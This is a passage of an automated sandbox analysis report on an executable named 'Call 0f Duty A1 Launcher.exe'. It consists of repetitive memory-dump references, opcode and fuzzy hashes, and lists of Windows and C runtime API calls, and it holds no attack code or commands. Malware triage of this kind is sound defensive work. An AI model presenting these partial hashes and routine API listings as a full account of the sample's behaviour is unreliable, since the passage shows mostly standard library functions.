                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___std_exception_destroy
                                                                                      • String ID:
                                                                                      • API String ID: 4194217158-0
                                                                                      • Opcode ID: 0c7aa920e9bae2739559070dde114d65f8997e9b8ca89ff7f932a7d64fa205b2
                                                                                      • Instruction ID: b95a0c36ba873be1c49810f0bc17ec21eee35811d5d39ccde1b94e884909e439
                                                                                      • Opcode Fuzzy Hash: 0c7aa920e9bae2739559070dde114d65f8997e9b8ca89ff7f932a7d64fa205b2
                                                                                      • Instruction Fuzzy Hash: 1DA27A66A555844FEF024AB884B93DF6FE64B6B330F6A2755C6F06F2D3D50B000B9B60
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: -g}5
                                                                                      • API String ID: 0-4071012034
                                                                                      • Opcode ID: 0b7d99f72f706f6893b0f6c9ad2fda7c392dcdb80b3f3784fe120c6fe88f6d33
                                                                                      • Instruction ID: 65fa6495c7ab5a007664dadf195e9860c72b4359cbea28f38403918373b5b3e6
                                                                                      • Opcode Fuzzy Hash: 0b7d99f72f706f6893b0f6c9ad2fda7c392dcdb80b3f3784fe120c6fe88f6d33
                                                                                      • Instruction Fuzzy Hash: F392A8A6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C507004A9B10
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00381F2D,?,?,00000008,?,?,00381AFF,00000000), ref: 003821FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 10d695b2dee4a1e44c5deeb97006bcd1c3469ef40e7ff39d18a9f4e0e8a03a5f
                                                                                      • Instruction ID: be55b5da6fba43ff7ad71b26628201209915190342185de2f30bd4bda72b4de4
                                                                                      • Opcode Fuzzy Hash: 10d695b2dee4a1e44c5deeb97006bcd1c3469ef40e7ff39d18a9f4e0e8a03a5f
                                                                                      • Instruction Fuzzy Hash: B5B17171110708DFD716DF28C48AB667BE0FF45364F268698E999CF2A1C335E992CB40
                                                                                      APIs
                                                                                        • Part of subcall function 0037B807: HeapAlloc.KERNEL32(00000008,?,?,?,0037A057,00000001,00000364,?,00000006,000000FF,?,00376E25,00389D20,0000000C), ref: 0037B848
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037C8CB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0037C9BF
                                                                                      • FindClose.KERNEL32(00000000), ref: 0037C9FE
                                                                                      • FindClose.KERNEL32(00000000), ref: 0037CA31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                      • String ID:
                                                                                      • API String ID: 2701053895-0
                                                                                      • Opcode ID: 0a0806dbe6a12acbf8c186e9525049575d54884332245b91d5de163350fc6d66
                                                                                      • Instruction ID: 027f46f4b51e01a4dd5937fb80267ad3ee2f171ae84de0c7433a9b354bddd42d
                                                                                      • Opcode Fuzzy Hash: 0a0806dbe6a12acbf8c186e9525049575d54884332245b91d5de163350fc6d66
                                                                                      • Instruction Fuzzy Hash: E851327690020CAFDB369F289C84ABEB7B9DF85314F14D1ADF40D97202EB388D419B60
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00375216
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: f348b61ec6051f3c0f1d706d7ec58de1d1a29ebfeab2cd7415c05fe4458e5105
                                                                                      • Instruction ID: a41276379603a1fee761067205c5765fdef6d6e590ba950b370ec2ee9ad7d645
                                                                                      • Opcode Fuzzy Hash: f348b61ec6051f3c0f1d706d7ec58de1d1a29ebfeab2cd7415c05fe4458e5105
                                                                                      • Instruction Fuzzy Hash: 69516371A117098FEB2ACF55D8817AEB7F4FB48350F25D8AAD415EB261E3B89900CF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: k#fz
                                                                                      • API String ID: 0-1948189604
                                                                                      • Opcode ID: 207652cf4f8846ef7ebd057746a6ff47ffbba62abaf740deebb90a907be27194
                                                                                      • Instruction ID: f9d5532068a66ae82dc43558c21e73be10980d92bfce10116e743810f78b30ae
                                                                                      • Opcode Fuzzy Hash: 207652cf4f8846ef7ebd057746a6ff47ffbba62abaf740deebb90a907be27194
                                                                                      • Instruction Fuzzy Hash: 1FD13072E115188FDB10CEBDC94469DB7F2AB88730F2A8329E875FB6D4D73499418B80
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 0037543D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 3cba7f1991d959cd5be49bed2b80e322bbb01c79ff80025a8ab61975a121a22e
                                                                                      • Instruction ID: 83c12e30f4923d95cd42d949e87c2beb8094c6c6ecf16ae3cea54e75478730f7
                                                                                      • Opcode Fuzzy Hash: 3cba7f1991d959cd5be49bed2b80e322bbb01c79ff80025a8ab61975a121a22e
                                                                                      • Instruction Fuzzy Hash:
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 25825cb0d32e1326572ca343939b5bb3d19de2e6d2aefbcba4bd178d13ce14d1
                                                                                      • Instruction ID: 931c7d33511063728d24bd4cab42178c2a8106877c5b96e3b2fa0823e1b15485
                                                                                      • Opcode Fuzzy Hash: 25825cb0d32e1326572ca343939b5bb3d19de2e6d2aefbcba4bd178d13ce14d1
                                                                                      • Instruction Fuzzy Hash: EDA01130A02300CB8B828F32AE0830A3AACAA00382B0880EAA000C2220EA3080088B00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cc29925a41da28b74d8b97a09df0f7274525891e80f1aa1ee6305b506d593d76
                                                                                      • Instruction ID: 77d36920c30d6e44fa00d9ce0fceff1db1057794295b08eb3cfee5ead7d0a7ce
                                                                                      • Opcode Fuzzy Hash: cc29925a41da28b74d8b97a09df0f7274525891e80f1aa1ee6305b506d593d76
                                                                                      • Instruction Fuzzy Hash: E632C276E446844FEB018ABCC4A53DF6FF24B6B334F2A5719C5A46F3D6DA1B040A8B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16db9b61e94d412fcb0b1ea37cd9e84945ab70e60adb5f0909a10ce17f2a5542
                                                                                      • Instruction ID: d4cece0a11bf11eca058980e207d1a3d115a969d9b224812a1437f0f55f157fb
                                                                                      • Opcode Fuzzy Hash: 16db9b61e94d412fcb0b1ea37cd9e84945ab70e60adb5f0909a10ce17f2a5542
                                                                                      • Instruction Fuzzy Hash: 9802D177A916404FEF01497CC8B83DB1FE747AB735E2A6726CAB05B6E2C55B000E9B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ba5ecd6acb2a5cf44647000c1ce0230ebc61b93c9c89a0425b5c598f581abcb4
                                                                                      • Instruction ID: 4c6b426a7e5715d8a27ed803714cc8d876eba74c724f6b2fb5f9b0ef48fbc8bb
                                                                                      • Opcode Fuzzy Hash: ba5ecd6acb2a5cf44647000c1ce0230ebc61b93c9c89a0425b5c598f581abcb4
                                                                                      • Instruction Fuzzy Hash: B3E14972A505504FDF018A7CC4A93DF2FE6476B334F2A6726CAB0AF7D6D61B08099B50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3eb5a767b9580598e095dc1a1a16096ffc9c83f9f6bddfbb6ba0235543bb1422
                                                                                      • Instruction ID: 6ec1b214cf9f4ea045e7b9a5bb9b96c1b8ab5cc491b5f1a5adce53969838b7a5
                                                                                      • Opcode Fuzzy Hash: 3eb5a767b9580598e095dc1a1a16096ffc9c83f9f6bddfbb6ba0235543bb1422
                                                                                      • Instruction Fuzzy Hash: 6DD06C3A645A59AFC211CF49E840D41F7A8FB89670B1540A6EA0893B21C331F811CBE0
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 003791F2
                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00379300
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00379351
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00379452
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0037946D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                      • String ID: 818$@]7$csm$csm$csm
                                                                                      • API String ID: 4119006552-2009321936
                                                                                      • Opcode ID: e67777dcced4f81d4f0ab6d9b15f034a9ebd7bdd3c17cff176c526d7104a05bf
                                                                                      • Instruction ID: 08889fdb3d28f9a84c8e5f97366cbf433cfff11735f6957015f148e943e32fe1
                                                                                      • Opcode Fuzzy Hash: e67777dcced4f81d4f0ab6d9b15f034a9ebd7bdd3c17cff176c526d7104a05bf
                                                                                      • Instruction Fuzzy Hash: 8AB19E31C00209EFCF36DFA5C885AAEB7B5FF04310B15865AE8196B252D739DA52CB91
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00376167
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0037616F
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 003761F8
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00376223
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00376278
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: ^7$csm
                                                                                      • API String ID: 1170836740-802198599
                                                                                      • Opcode ID: 2fa574555cd43d2a88f0e74f6aefe117a69302e7517e6f334f180538919df2c7
                                                                                      • Instruction ID: 44e61cdfbdf083e0e6e89aa65bac8d6403b199c3e3a6feb796548299be865d3f
                                                                                      • Opcode Fuzzy Hash: 2fa574555cd43d2a88f0e74f6aefe117a69302e7517e6f334f180538919df2c7
                                                                                      • Instruction Fuzzy Hash: F241E434A00609EBCF22DF68C856A9EBBB4FF45314F14C5A5E81D5B353D739AA05CB90
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(029CE8D0,029CE8D0,00000000,7FFFFFFF,?,003802F3,029CE8D0,029CE8D0,00000000,029CE8D0,?,?,?,?,029CE8D0,00000000), ref: 003803AE
                                                                                      • __alloca_probe_16.LIBCMT ref: 00380469
                                                                                      • __alloca_probe_16.LIBCMT ref: 003804F8
                                                                                      • __freea.LIBCMT ref: 00380543
                                                                                      • __freea.LIBCMT ref: 00380549
                                                                                      • __freea.LIBCMT ref: 0038057F
                                                                                      • __freea.LIBCMT ref: 00380585
                                                                                      • __freea.LIBCMT ref: 00380595
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                      • String ID:
                                                                                      • API String ID: 127012223-0
                                                                                      • Opcode ID: b92caf236326a295665b972c5ed6c8a6ddb1de72abf154ed8ac54ddc77880632
                                                                                      • Instruction ID: 57fe41e9bcc4a57ec946b52b0631da5789bea6de07e4106988659fa53c828e7a
                                                                                      • Opcode Fuzzy Hash: b92caf236326a295665b972c5ed6c8a6ddb1de72abf154ed8ac54ddc77880632
                                                                                      • Instruction Fuzzy Hash: 667118729043059BDF7BBF648C41FAE7BB99F4A310F2A4095E948AB241E774DD088B60
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00378831,00375F0D,003755A4), ref: 00378848
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00378856
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0037886F
                                                                                      • SetLastError.KERNEL32(00000000,00378831,00375F0D,003755A4), ref: 003788C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 1631fb61bf229814e1e54002212f1246bfd97842da61e94cdd14cd631f19c272
                                                                                      • Instruction ID: dd3bcde4a1741c5bd3ec9be15031d1fc7adb3acae7d48edac8b3df8cf2550b97
                                                                                      • Opcode Fuzzy Hash: 1631fb61bf229814e1e54002212f1246bfd97842da61e94cdd14cd631f19c272
                                                                                      • Instruction Fuzzy Hash: 5101D8321593126DEA371BB57C8A96A279CEF117B4B75836AF02C591F1EF194C019342
                                                                                      Strings
                                                                                      • C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe, xrefs: 0037CB70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043249138.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042955657.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043293521.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043327875.000000000038B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043357423.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043387506.000000000038F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2043437298.0000000000391000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_360000_Call 0f Duty A1 Launcher.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                      • API String ID: 0-1143822768
                                                                                      • Opcode ID: 0ed2e03aa12653004b7715ebe015e4dc86f09d6cf3fb2267e4d4f776737f6f19
                                                                                      • Instruction ID: 58732f3d0b025276cffba1e16de93d06bf62ebf412c2802358b790da266f2135
                                                                                      • Opcode Fuzzy Hash: 0ed2e03aa12653004b7715ebe015e4dc86f09d6cf3fb2267e4d4f776737f6f19
                                                                                      • Instruction Fuzzy Hash: FF21F3B1210206AFCB33AF76CC82D6AB7ADAF443A4701D51DF81D9B551D738EC4197A0
